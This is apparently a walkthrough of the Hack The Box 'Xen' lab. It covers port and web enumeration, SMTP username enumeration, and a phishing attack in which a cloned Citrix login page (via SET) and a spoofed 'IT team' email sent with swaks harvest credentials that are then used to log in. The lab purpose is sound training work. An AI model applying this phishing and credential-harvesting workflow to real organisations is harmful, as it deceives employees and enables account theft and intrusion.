Xen

Note: For anyone participating within endgames, please keep in mind when downloading for .ovpn file to select the UDP option and you may sometimes need to regenerate your vpn to interact with the boxes.

Entry Point

10.13.38.12

initial nmap scan

sudo nmap -p- --min-rate 1500 10.13.38.12 | cut -d"/" -f1 | tr '\n' ','

we can see we have the following ports open on the target machine 10.13.38.12

25,80,443

Lets find further information on this ports

sudo nmap -sCV -A -p25,80,443 -oA TCP_10.13.38.12 10.13.38.12

results

25/tcp  open  smtp
| fingerprint-strings: 
|   GenericLines, GetRequest: 
|     220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
|     sequence of commands
|     sequence of commands
|   Hello: 
|     220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
|     EHLO Invalid domain address.
|   Help: 
|     220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   NULL: 
|_    220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp  open  http     Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Did not follow redirect to https://humongousretail.com/
443/tcp open  ssl/http Microsoft IIS httpd 7.5
|_ssl-date: 2024-01-21T03:31:10+00:00; -1s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
|_http-title: Did not follow redirect to https://humongousretail.com/
| ssl-cert: Subject: commonName=humongousretail.com
| Subject Alternative Name: DNS:humongousretail.com
| Not valid before: 2019-03-31T21:05:35
|_Not valid after:  2039-03-31T21:15:35
|_http-server-header: Microsoft-IIS/7.5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.94%I=7%D=1/20%Time=65AC8FC3%P=x86_64-pc-linux-gnu%r(NULL
SF:,33,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LOCAL
SF:\)\r\n")%r(Hello,55,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCH
SF:ANGE\.HTB\.LOCAL\)\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n
SF:")%r(Help,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.H
SF:TB\.LOCAL\)\r\n211\x20DATA\x20HELO\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x20R
SF:CPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")%r(GenericLines,6F,"220\x20ESM
SF:TP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x20Ba
SF:d\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comm
SF:ands\r\n")%r(GetRequest,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x2
SF:0\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n503\x20Bad\x20sequence\x20of\x20commands\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|Vista|8.1 (90%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_8.1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows Embedded Standard 7 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (89%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (89%), Microsoft Windows Vista SP2 (89%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1s

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   288.19 ms 10.10.14.1
2   288.27 ms 10.13.38.12

what we see

• we can see SMTP, Simple Mail Transfer Protol (port 25) is enabled: Possible Phishing? enumerate usernames?

• We can see IIS both HTTP and HTTPS Both redirecting to humongousretail.com we can add this to our hosts file

HTTPS

• Looks like the web site offers some kind of subcription service

• if we scroll to the bottom the page we can find a link 'Join the team' which shows us an email address jointheteam@humongousretail.com could be useful for phishing if need be

Lets start enumerating

Lets run Nikto and see if these are any low hanging furits

nikto --output nikto_scan_humongousretail

results

---------------------------------------------------------------------------
+ Target IP:          10.13.38.12
+ Target Hostname:    humongousretail.com
+ Target Port:        80
+ Start Time:         2024-01-20 22:39:54 (GMT-5)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ /: Retrieved x-powered-by header: ASP.NET.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /xdpD6NIS.ashx: Retrieved x-aspnet-version header: 2.0.50727.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ /README.TXT: This might be interesting.
+ /readme.txt: This might be interesting.
+ /LICENSE.txt: License file found may identify site software.
+ /license.txt: License file found may identify site software.
+ /LICENSE.TXT: License file found may identify site software.
+ 7962 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2024-01-20 23:21:07 (GMT-5) (2473 seconds)
---------------------------------------------------------------------------

Gobuster, lets see if we can find any hidden directories

gobuster dir -k -u http://humongousretail.com/ -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -t 50

results

/images               (Status: 301) [Size: 157] [--> http://humongousretail.com/images/]
/css                  (Status: 301) [Size: 154] [--> http://humongousretail.com/css/]
/js                   (Status: 301) [Size: 153] [--> http://humongousretail.com/js/]
/remote               (Status: 301) [Size: 157] [--> http://humongousretail.com/remote/]
/jakarta              (Status: 401) [Size: 1293]

/remote

when we click 'skip to logon' we are bought to a login prompt

what is Citrix XenApp?

• essentially it is an extended solution to Microsoft's Remote Desktop Service, allowing users to access their workstations remotely. If we could find a set of working credentials this could provide us access to internal hosts or applications

SMTP

Lets see if we can enumerate any users in the domain via SMTP using the Pentest monkey's smtp-user-enum tool, essentially we will run this with a wordlist, the domain name humongousretail.com , which matches the email we found earlier, and we are going to utilise the RECP TO method

sudo perl /opt/smtp-user-enum/smtp-user-enum.pl -U /opt/SecLists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt -D humongousretail.com -t 10.13.38.12 -m 50 -M RCPT

we can confirm the email address

10.13.38.12: it@humongousretail.com exists
10.13.38.12: legal@humongousretail.com exists
10.13.38.12: marketing@humongousretail.com exists
10.13.38.12: sales@humongousretail.com exists
10.13.38.12: SALES@humongousretail.com exists

Gone Phishing

Now we can use the following emails, and try to Phish for credentials related to the Citrix Login

1. Lets use the Social Engineering Toolkit to set up a fake website and phish the users, as SET supports cloning web pages and capturing incomming credentials

setoolkit
Social-Engineering Attacks
Website attack vectors
credential harvester attack method

• we want to specify our VPN IP address when prompted

• Now we can set the url of the website we want to clone in this case the Citrix login page

https://humongousretail.com/remote/auth/login.aspx

Now our cloned page is up and running

Now we just need to creaft our phishing email

for this we can utuilze swaks which can be used to send emails from the command line

1. Lets create a body.txt file

Hey

we are currently running tests via the citrix login page, we need to confrim all users login information is up to date, if you could verify this and login via http://10.10.14.4/remote/auth/login.aspx 

best regards
IT team

1. Now we can send our malicous email off and hopefully some one will attempt to login

swaks --to sales@humongousretail.com --from its@humongousretail.com --server 10.13.38.12 --port 25 --body body.txt

1. after waiting for a minute a user attempted to login into there account

we have the following creds

HTB.LOCAL/awardel: @M3m3ntoM0ri@

Lets see if we can login via the citrix prompt

WOOHOOO we have access

Looking through messages we need to download the citrix client to gain further functionality of the application, we can download it from the following link

Citrix Workspace app 2508.10 for Linux - CitrixCitrix

• we want the latest Debian package

Now we can install it

sudo dpkg -i ~/Downloads/icaclient_23.11.0.82_amd64.deb

after we have citrix installed on our local machine we can click on the following

• this will download our launch.ica file which we can use to establish a connection to the workstation

Now we can simply click on the file and we have access to the workstation